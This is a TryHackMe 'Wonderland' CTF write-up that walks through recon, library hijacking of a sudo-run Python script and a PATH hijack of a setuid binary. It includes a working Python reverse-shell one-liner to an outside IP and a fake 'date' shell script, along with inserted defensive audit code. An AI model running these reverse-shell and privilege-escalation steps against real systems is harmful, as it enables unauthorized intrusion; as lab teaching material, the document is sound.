This is my writeup for the wonderland room/machine of the TryHackMe.com platform. Remember this is just how I solved/owned the machine; maybe there are different and faster paths but…
Machine
Fall down the rabbit hole and enter wonderland.
The machine is called wonderland, room wonderland, the link is https://tryhackme.com/room/wonderland. This is a medium machine, I spent more time than I thought but…it’s a really good exercise to complete!
With this machine you can refresh a lot of good things about privilege escalation and how to read an ELF file. Remember the IP changes every time…
Recon
First of all I run a classic nmap scan:
nmap -sC -sV -p- 10.10.40.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 04:44 EST
Nmap scan report for 10.10.40.248
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I’m looking at a Linux machine with the two classic ports open: 22 and 80.
The website is just a single page:
I run a cURL just in case I’m missing something:
curl -L -i http://10.10.40.248
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/html;charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:45:08 GMT
Date: Tue, 18 Jan 2022 09:48:39 GMT
<!DOCTYPE html>
<head>
<title>Follow the white rabbit.</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Follow the White Rabbit.</h1>
<p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
<img src="/img/white_rabbit_1.jpg" style="height: 50rem;">
</body>
The only new folder is the /img one and I’ll take a look in a bit.
I run a gobuster in order to check if there are some other pages hidden/not linked (for pages and directories)
gobuster dir -u http://10.10.40.248 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.248
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/01/18 04:50:26 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.248/img                  (Status: 301) [Size: 0] [--> img/]
http://10.10.40.248/index.html           (Status: 301) [Size: 0] [--> ./]
http://10.10.40.248/r                    (Status: 301) [Size: 0] [--> r/]
gobuster dir -u http://10.10.40.248 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.248
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/18 04:51:51 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/r                    (Status: 301) [Size: 0] [--> r/]
/poem                 (Status: 301) [Size: 0] [--> poem/]
and I notice there is a /r page, so I browse to it
Nice…but still nothing, just an html page without any other clue. The /poem page is the same, just a “non-sense” poem :)
I run another gobuster for the directories, this time using http://10.10.40.248/r as the starting point…and voilà! It appears there is a /a following the /r page
Wait wait…what is following Alice? The white rabbit.
I’ve a clue: /r/a/, 99% sure the following pages will be /r/a/b/b/i/t
and there it is! Still a normal page without any link, I run a cURL and
curl -L -i http://10.10.40.248/r/a/b/b/i/t
HTTP/1.1 301 Moved Permanently
Location: t/
Date: Tue, 18 Jan 2022 10:07:42 GMT
Content-Length: 0
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 782
Content-Type: text/html;charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:41:05 GMT
Date: Tue, 18 Jan 2022 10:07:42 GMT
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:####THEPASSISHERE###</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
…finally I’ve the user and pass to access as alice!
Another clue, which I found later, was hidden in the image white_rabbit_1.jpg
If I download the image present on the home page and analyze it with steghide I find a clue:
steghide extract -sf Downloads/white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
yes…I’ll follow the /r/a/b/b/i/t :)
Initial foothold (as alice)
I connect to the machine via SSH using alice and the password found:
ssh alice@10.10.40.248
...
alice@wonderland:~$
First of all I check what is present in my home directory
alice@wonderland:~$ ls -ltra
total 44
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwx------ 2 alice alice 4096 May 25 2020 .cache
-rw------- 1 root root 66 May 25 2020 root.txt
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
drwxr-xr-x 6 root root 4096 May 25 2020 ..
-rw------- 1 alice alice 7 Jan 18 10:14 .python_history
drwxr-xr-x 5 alice alice 4096 Jan 18 10:14 .
The file root.txt will contain the root flag…for sure (and I can’t read it now) and the python script seems really interesting.
Now the tricky part: the hint on the room is Everything is upside down here.…well…if root.txt is in alice’s homedir it means user.txt is in root’s homedir
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ cat /etc/sudoers.d/alice
alice ALL=(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su
alice@wonderland:~$ find / -type f -perm -04000 -ls 2>/dev/null
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
alice@wonderland:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
Ok, it seems I can run the python script as the user rabbit (and gain access as rabbit), let’s read it:
alice@wonderland:~$ cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
...cut...
"""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
The script just imports a library (random), calls a method of this library (choice)…and prints some random string included in the script.
After a small research I found a good website with a clear explanation of Python Library Hijacking:
This vulnerability is based on the priority order of the Python library path that is applied to the module file that our script is importing. When a module is imported in a script, Python will look for the particular module file inside the default directories in a particular priority order. In the python script that we created, we have the webbrowser.py module file that is called. The module that is being searched will be located in one of the default paths. Although if there exists a python module file in the same directory as the original script, it will get priority over the default paths.
What I have to do is create a python file (or just copy the real random library) in alice’s home dir, modify it with a reverse shell for example, and run the script with sudo as rabbit.
Some other players just created a new script with a reverse shell or executed just a bash…my method is a little bit different and the same as the example present on the website: copy the random.py library, modify the choice method, open a new netcat listener on port 4444 and run the script (yes..more “difficult”)
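To see why the shadowing works, and what an administrator reviewing a sudo rule like alice’s should check, here is an added example (my own code, not part of the writeup or the room). It reproduces the interpreter’s lookup order without touching `sys.path`: the script’s directory is searched first, so a `random.py` planted there wins over the standard library copy. It then reports the two preconditions of the hijack: a module resolved from outside the stdlib, and a script directory the invoking user can write to. The script name and the constructed shadow module in the demo are assumptions.

```python
"""Check where a Python import would actually be resolved from.

Added example, not code from the writeup or the room. Mirrors the lookup
order behind the random.py hijack: the directory of the script comes first on
sys.path, so a random.py beside walrus_and_the_carpenter.py shadows the
standard library copy. Reports the conditions a sudo rule like alice's
should be checked for: a module loaded from outside the stdlib, and a script
directory writable by the caller.
"""
import importlib
import os
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder

# Where this interpreter keeps its standard library (realpath so symlinked
# installs compare cleanly).
STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def resolve_module(name, script_dir):
    """Return (origin, is_stdlib) for `name` as seen by a script in script_dir.

    The script directory is searched first, then the remaining sys.path
    entries, exactly as the interpreter does; sys.path itself is untouched.
    origin is None when the module is not found on disk (e.g. a builtin).
    """
    script_dir = os.path.realpath(script_dir)
    # A freshly planted file must be seen: drop stale directory listings.
    importlib.invalidate_caches()
    search = [script_dir] + [
        p for p in sys.path if p and os.path.realpath(p) != script_dir
    ]
    spec = PathFinder.find_spec(name, search)
    if spec is None or not spec.origin or not os.path.exists(spec.origin):
        return None, False
    origin = os.path.realpath(spec.origin)
    return origin, origin.startswith(STDLIB_DIR + os.sep)


def audit_script(script_path, imported_names):
    """Report modules the script would load from its own directory instead of
    the stdlib, plus whether that directory is writable by the current user.
    Both true together is the hijack precondition the writeup exploits."""
    script_dir = os.path.realpath(os.path.dirname(os.path.abspath(script_path)))
    shadowed = {}
    for name in imported_names:
        origin, is_stdlib = resolve_module(name, script_dir)
        if origin and not is_stdlib and origin.startswith(script_dir + os.sep):
            shadowed[name] = origin
    return {
        "script_dir": script_dir,
        "dir_writable": os.access(script_dir, os.W_OK),
        "shadowed": shadowed,
    }


if __name__ == "__main__":
    # Constructed demo: a script importing random, before and after a shadow
    # random.py appears next to it.
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "walrus_and_the_carpenter.py")  # assumed name
        with open(script, "w") as f:
            f.write("import random\n")
        print("clean:", audit_script(script, ["random"]))
        with open(os.path.join(d, "random.py"), "w") as f:
            f.write("# constructed shadow module\n")
        print("shadowed:", audit_script(script, ["random"]))
```

Run as the user the sudo rule grants (alice here), not as root, so `dir_writable` reflects the real caller. The fix the audit points at is to keep the script in a root-owned directory and to run it with `python3 -I` (isolated mode), which drops the script directory from `sys.path`.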
alice@wonderland:~$ cp /usr/lib/python3.6/random.py .
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ vi random.py
## -------------------- sequence methods -------------------
    def choice(self, seq):
        """Choose a random element from a non-empty sequence."""
        try:
            #### the new line is this one:
            import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
            ####
            i = self._randbelow(len(seq))
        except ValueError:
            raise IndexError('Cannot choose from an empty sequence') from None
        return seq[i]
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
and in the new listener the shell appears
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.188.29] 47908
$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
$
Good! I’m rabbit now…next step is moving to root! Oops, no! There is the hatter user before root.
PrivEsc 2 (hatter)
As usual, I run some classic commands in order to understand what I can and I can’t do
rabbit@wonderland:/home/rabbit$ ls -ltra
ls -ltra
total 40
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
rabbit@wonderland:/home/rabbit$ file teaParty
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
1049052 20 -rwsr-sr-x 1 root root 16816 May 25 2020 /home/rabbit/teaParty
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
The most interesting file is the teaParty executable, nothing else is present and I focus on it.
The teaParty ELF is nothing really special, if I run it I just get a seg fault
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 18 Jan 2022 16:28:43 -0500
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
I download the file into my kali box with netcat and I check it:
objdump -s -j .rodata teaParty
teaParty:     file format elf64-x86-64
Contents of section .rodata:
 2000 01000200 00000000 57656c63 6f6d6520  ........Welcome 
 2010 746f2074 68652074 65612070 61727479  to the tea party
 2020 210a5468 65204d61 64204861 74746572  !.The Mad Hatter
 2030 2077696c 6c206265 20686572 6520736f   will be here so
 2040 6f6e2e00 00000000 2f62696e 2f656368  on....../bin/ech
 2050 6f202d6e 20275072 6f626162 6c792062  o -n 'Probably b
 2060 79202720 26262064 61746520 2d2d6461  y ' && date --da
 2070 74653d27 6e657874 20686f75 7227202d  te='next hour' -
 2080 52000000 00000000 41736b20 76657279  R.......Ask very
 2090 206e6963 656c792c 20616e64 20492077   nicely, and I w
 20a0 696c6c20 67697665 20796f75 20736f6d  ill give you som
 20b0 65207465 61207768 696c6520 796f7520  e tea while you 
 20c0 77616974 20666f72 2068696d 00000000  wait for him....
 20d0 5365676d 656e7461 74696f6e 20666175  Segmentation fau
 20e0 6c742028 636f7265 2064756d 70656429  lt (core dumped)
 20f0 00                                   .
strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped);*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
The only interesting part is /bin/echo -n 'Probably by ' && date --date='next hour' -R and, looking at it more closely, the date command is called without its full/absolute path.
It means I can change the $PATH variable, e.g. add /tmp at the beginning of it, and create a fake date command in /tmp that spawns a shell. And, hopefully, I’ll be the hatter user
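The root cause is that a setuid program trusts the caller’s PATH for a command it runs by bare name. As an added example (my own code, not the writeup’s or the room’s), the following audits a PATH string the way a reviewer of a setuid binary would: it reproduces the resolution with `shutil.which`, flags the PATH entries an unprivileged caller could plant a binary in, and shows the invocation the program should have used instead. The `SECURE_PATH` value is the `secure_path` from the sudoers defaults printed earlier in the writeup; the fake `date` in the demo is constructed.

```python
"""Audit a PATH for command-hijacking risk before a privileged program trusts it.

Added example, not code from the writeup or the room. teaParty calls `date`
through system() without an absolute path, so the setuid process resolves it
with whatever PATH its caller supplied. This reproduces that resolution,
flags PATH entries an unprivileged caller can write to, and shows the
hardened invocation (absolute path, fixed PATH, argv instead of a shell).
Run it as the unprivileged caller, not as root, so the writability checks
reflect the real attacker position.
"""
import os
import shutil
import stat
import tempfile

# secure_path from the sudoers defaults shown earlier in the writeup
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def writable_by_unprivileged(directory):
    """True if the current user, or everyone, can create files in directory.

    The sticky bit on /tmp does not help here: it only stops deleting other
    users' files, and the hijack needs a new file named `date`, not a
    replaced one.
    """
    try:
        mode = os.stat(directory).st_mode
    except OSError:
        return False
    return os.access(directory, os.W_OK) or bool(mode & stat.S_IWOTH)


def risky_entries(path_str):
    """PATH entries, in search order, an unprivileged user could plant a binary in."""
    return [p for p in path_str.split(os.pathsep) if p and writable_by_unprivileged(p)]


def audit_path(path_str, commands):
    """For each bare command name, report the file PATH resolution lands on and
    whether its directory is hijackable. A hit under a risky entry means a
    setuid program using this PATH would execute attacker-controlled code."""
    report = {}
    for cmd in commands:
        found = shutil.which(cmd, path=path_str)
        resolved = os.path.realpath(found) if found else None
        report[cmd] = {
            "resolved": resolved,
            "hijackable": bool(resolved)
            and writable_by_unprivileged(os.path.dirname(resolved)),
        }
    return report


def hardened_invocation():
    """How teaParty should have run its date command: absolute binary path,
    a minimal environment with a fixed PATH, and an argv list instead of a
    shell string. Pass to subprocess.run(argv, env=env) (or execve in C)."""
    argv = ["/bin/date", "--date=next hour", "-R"]
    env = {"PATH": SECURE_PATH}
    return argv, env


if __name__ == "__main__":
    # Constructed demo: a writable directory with a fake `date` in front of
    # the secure path, as the writeup does with /tmp.
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "date")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho constructed fake date\n")
        os.chmod(fake, 0o755)
        hijacked = d + os.pathsep + SECURE_PATH
        print("risky entries:", risky_entries(hijacked))
        print("date under hijacked PATH:", audit_path(hijacked, ["date"]))
        print("date under secure PATH:", audit_path(SECURE_PATH, ["date"]))
        print("hardened:", hardened_invocation())
```

The same check applies to any cron job, sudo rule or setuid helper that shells out: compare the PATH it will actually see against `risky_entries`, and prefer absolute paths with a fixed environment over relying on the caller.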
rabbit@wonderland:/$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
rabbit@wonderland:/tmp$ echo '#!/bin/bash' > /tmp/date
rabbit@wonderland:/tmp$ echo '/bin/bash' >> /tmp/date
rabbit@wonderland:/tmp$ cat /tmp/date
#!/bin/bash
/bin/bash
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home/rabbit$
And boom! I’m the user hatter, let’s check the home dir:
hatter@wonderland:/home/rabbit$ cd ../hatter
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
THISISTHEHATTERPASS
The password of the user hatter is in the file! Good, let’s check via SSH